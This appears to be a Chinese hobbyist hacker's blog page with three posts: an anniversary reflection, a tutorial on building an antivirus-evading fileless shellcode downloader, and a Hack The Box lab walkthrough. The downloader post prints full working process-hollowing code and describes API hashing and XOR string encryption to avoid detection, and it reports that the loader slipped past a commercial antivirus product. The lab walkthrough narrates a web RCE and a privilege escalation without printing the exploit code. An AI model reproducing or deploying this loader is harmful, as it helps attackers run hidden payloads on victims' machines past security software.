博客六周年辣

前言 & about me

从当初无忧无虑的中二少年,到现在逐步快要跨入社会的二逼青年。没想到这个站点竟然陪了我六年之久。

感觉对时间的给概念变得愈来愈模糊了。从以前的 “时间啊,请过的快一些流逝吧”,到现在,一转眼间,去年今日之事仿佛就在昨日。

可以很明显感觉到时间流逝的速度有两个档口,一个是08年之后,这个是对于社会的变化,因为全中国直接步入信息社会,我们每天接受的信息密度呈几何倍增长,所以网络上都觉得从那之后,时间变快了。

还有一个档口,是对于我自己的。可以说是从18年高考的时候吧。原因我就懒得打了,不是什么不好开口的东西只是单纯因为懒。

愈发愈觉得自己菜,十分的fw。但是又觉得这样菜也不是什么坏事,因为没有什么好比较的。反正又不是没有上进心去学习,做好自己就行。尽自己最大努力吧。

天塌下来了有高个子顶着

不过我还是得努力学习,立刻目标是争取能自己养活自己

第二目标是希望在上面的基础上找的是自己喜欢的工作。

about 博客

和以前的情况不通,以前是怎么挤都挤不出内容只好谈天说地聊各种奇怪的东西。

现在肚子里确实有一些东西。不过都是不太好发出来的东西。

只能随手发一些不那么敏感的东西。

当然更大原因是因为懒。毕竟要发文章还是得需要准备的。

总之就这么多了。感谢大家的支持。虽然不知道还有没有人看这个无聊的站点就是了。

Tags: 周年

无文件下载者计划 & 连载

前言 & 挖坑

项目地址:9bie / RmExecute

最近流行文件不落地,然后因为jio本又被杀的多了,辣么有什么办法快速弄出不落地免杀效果又好的东西呢?

对没错就整个shellcode的payload吧,可以用某种 “伪” 方法把一些exe弄成不落地and shellcode得到形式。

目前设想有直接用VS2017,弄个下载者的payload,调用win32 API,然后下载DLL/EXE,直接内存加载。

这样虽然不是严格意义上的payload,但是这是最简单的方法

或者使用反射DLL方法,直接在内存中展开。这就是比较主流and常规的用法了。不过直接payload整反射DLL似乎有点难。

按照我这破水平,估计就是先远程下载内存加载反射DLL的DLL然后再由反射DLL去下载DLL payload再反射加载。

emmm怎么感觉有点饶,不过应该就这样吧。

研究资料

开始

首先,这次我们不从0开始写shellcoded了。直接整个shellcode框架。这里我们使用上面第二个链接的RcDllShelcode作为开头项目,因为这个框架比较简单(我看得懂,顺带强烈推荐这个作者的文章

用C++撰写shellcode.doc

分析的十分好,简明直观的点出了然而初步检查下来之后发现,这个作者的api实现部分是直接使用字符串来定位api地址。这会导致shellcode变得十分容易分析。

这时候我们就可以参考别的项目文件

这里我参考了PIC_Bindshell 这个项目,写的也很好,然而我已经使用上面那个项目作为入口了,就还是继续用上面那个吧。这个项目的API项目和我之前那个方法差不多,只不过别人的更加优雅,人家是PEB找getprocxxxx那个api之后,直接计算hash就能得出函数在文件中的地址,之后就可以直接调用了。。当然缺点也有,就是得自己预先硬编码一个hash表,略微的麻烦,但是也至少比直接字符串搜索api地址比较好。

相关原理在这里:详解Windows API Hashing技术

PIC_Bindshell使用的是RORT32加密hash,但是人家作者给出了计算脚本,省去了我们去编写的麻烦。直接脱下来使用。

hash.png

之后就是开始计算我们第一阶段需要的WINAPI了。

基础的有msvcrt所需的几个常用功能,memcpy,memset,malloc,free这些,之后就是WinHttpOpen,WinHttpOpenRequest这些函数,全部加入我们所需的hashmaping里,很轻松的我们就有如下

hash2.png

之后,我们首先先整个下载功能

下载功能

同上,故技重施

winhttp.png

之后就是一系列黑魔法调用winapi。。。总而言之。。我们成功的完成了下载功能。

内存运行

之后,我们当然就是直接借鉴(抄)一份,内存运行的代码啦。

直接贴上代码

bool RunPortableExecutable()
{
    
    IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
    IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
    IMAGE_SECTION_HEADER* SectionHeader;

    PROCESS_INFORMATION PI;
    STARTUPINFOA SI;

    CONTEXT* CTX;

    DWORD* ImageBase = NULL;; //Base address of the image
    void* pImageBase = NULL;; // Pointer to the image base

    char CurrentFilePath[MAX_PATH];

    DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
    NtHeader = PIMAGE_NT_HEADERS(DWORD(newbuff) + DOSHeader->e_lfanew); // Initialize

    fn.fnGetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable

    if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
    {
        //ZeroMemory(&PI, sizeof(PI)); // Null the memory
        //ZeroMemory(&SI, sizeof(SI)); // Null the memory
        fn.fnmemset(&PI, 0, sizeof(PI));
        fn.fnmemset(&SI, 0, sizeof(SI));
        if (fn.fnCreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) //make process in suspended state, for the new image.                                                                                      
        {
            // Allocate memory for the context.
            CTX = LPCONTEXT(fn.fnVirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
            CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

            if (fn.fnGetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
            {
                // Read instructions
                fn.fnReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
                pImageBase = fn.fnVirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase), NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

                //fix randomly crash
                if (pImageBase == 0) {
                    fn.fnResumeThread(PI.hThread);
                    return 1;
                }
                else {
                    // Write the image to the process
                    fn.fnWriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
                    for (int count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
                    {
                        SectionHeader = PIMAGE_SECTION_HEADER(DWORD(newbuff) + DOSHeader->e_lfanew + 248 + (count * 40));
                        fn.fnWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress), LPVOID(DWORD(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
                    }
                    fn.fnWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

                    // Move address of entry point to the eax register
                    CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
                    fn.fnSetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
                    fn.fnResumeThread(PI.hThread); //?Start the process/call main()
                }

                return true; // Operation was successful.
            }
        }
    }
    return false;
}

怎么说,效果拔群

photo_2021-02-22_17-09-53.jpg

特地选了个比较古老并且特征比较明显的试了下某数字,完全无弹窗也无响应(当然和我没有写启动有很大的关系。

至此,咱们首要的目标就这么完成啦!

进阶 - payload加密

虽说我们的API使用了winapi hashing技术,然而再查找地址前的loadlibrary中引用的那些DLL名称以及我们url地址我们也都没有进行加密,比较推荐的是XOR加密,base64加密也不是不可以,但是base64的硬编码了一个base64表特征也十分明显,当然也可以打乱base64表增加逆向难度。。。然而CTF考过多少次了应该没有人解不开打乱b64表之后的内容不会吧不会吧不会吧?

XOR比起base64,短小高效,虽然对着明眼人可能一眼就看出来是XOR加密,但是在本来就短小的shellcode中比起一整个base64表,xor已经是十分小巧且可以接受的,我才不会说是我懒得写base64呢。

进阶2 - 反射DLL

虽然说我们已经完成了内存加载并且成功的免杀无弹窗上线了,然而在下发可执行文件的时候,一下下发一整个文件过去,可能会有大量的代码我们是暂时用不到的,并且这样可能增大了被dump分析的风险。

那么我们有没有办法,再想要的时候,获取到这部分代码片段,再下载执行呢?

有两个办法,一个是把功能全部shellcode片段化,让每个功能都成为shellcode,这样太奢侈也太麻烦了。(俺觉得就算是APT也不会这样搞)。所以另外一个技术诞生了。

那就是反射DLL执行,原理和内存执行exe差不多,只不过我们是把DLL精简成"最小PE"的模式,之后把这部分dump下来,手动修补再RVA展开执行。

//未完待续

Tags: 汇编,

htb初探

前言

昨天才开的坑,今天就开始摸鱼了。。在家里练琴练了一天。。。等等,好像练琴才是我的专业来着?不管了

于是乎,练了无聊了,就突然叫九世有没有啥靶场玩,然后九世九发来了个htb

开始

注册htb这些啥的就不说了,就是js泄露一个api然后post就行注册。

之后直接下载ovpn进他们内网直接打靶场

history.png

经理了各种奇怪的东西,我们终于连上了。

开打

直接对着目标,御剑s扫描器走起

IP:10.10.10.215

portscan:
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


webinfo:
http://academy.htb/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.215], Title[Hack The Box Academy]


WebPath:
/Images
/server-status
/login.php
/register.php
/admin.php

photo_2021-02-19_23-12-47.jpg

初步断定就开个web,好的直接访问web。。。

跳转到一个域名然后显示dns访问失败。

手动加一下hosts

10.10.10.215 academy.htb

之后就可以进web了。

QQ截图20210219231502.png

对着对着上面御剑出来的结果,先去register.php注册个用户。

然后登录,登陆后界面如下

web.png

稍微看了下,似乎是一个成熟的cms,唯一比较可疑的就是url。这时候我们先不深挖,把这个放到一边

然后我们去看admin.phpserver-status这两个

其中server-status403了,也不管,admin.php弱口令走起,admin / admin

3.png

洋文不好我也不知道进没进去,但是我发现了一个新的资产

dev-staging-01,访问了下,一眼就看出是larvaral,还是开启的debug。

la那啥来着.png

这时候,脑内直接biu出几个lar那啥我不会拼的RCE,最后对照

rce1.png
rce2.png

直接秒掉

getshell.png
用时不到十分钟

提权

摸了会儿鱼(

系统版本是
`Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00
UTC 2020 x86_64 x86_64 x86_64 GNU/Linux`

看样子很新,脑内想不出啥exp

然后mysql权限也不高,查看/home的时候,发现了

home.jpg

结合后台登陆后的

Complete initial set of modules (cry0l1t3 / mrb3n)

这时候基本已经猜到了攻击流程。
liucheng.png

虽然不知道是否正确,但是按照这个思路走走看

数据库tmd一读(然而其实是在web目录下的.env的配置文件读到密码)。ssh就这么一登(撞了好几个用户)。

哟西,上去了,然而和预想有点偏差。。
rua.png
这时候我才发现分为user flag和root flag。那是我太天真了。

那接下来就是继续提权去拿root flag了。

接下来就是漫长的提权之旅。。

因为我的jio本不知道为啥跑不起来。。于是乎我就先手动看看,想着之后再跑自动收集jio本也就是

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

如何提权?高权进程SUID自运行脚本日志以及文件劫持等等。。。

其中,我发现tmp下有奇怪的tmp文件,里面有composer.json文件。。然后还不放你访问,一看用户是mrb3n。

这个用户再passwd中id比我们前一号,并且之前web页面也出现这个用户,所以基本断定要先登录这个用户了。。

正在我一筹莫展想着咋过去时,九世出了个好消息

hxx.png

成功用jio本收集到了mrb3n用户的密码

然后还有提示

sudo.jpg

基本提权方式就是,https://gtfobins.github.io/gtfobins/composer/

finish.png

自此基本结束

双双和九世拿着flag把家还,呸,各回各家,各找各妈

总结

靶场还挺好玩,没有想象中的无聊,但是也没有想象中的刺激。

总之就这么多了,先溜了。

Tags: none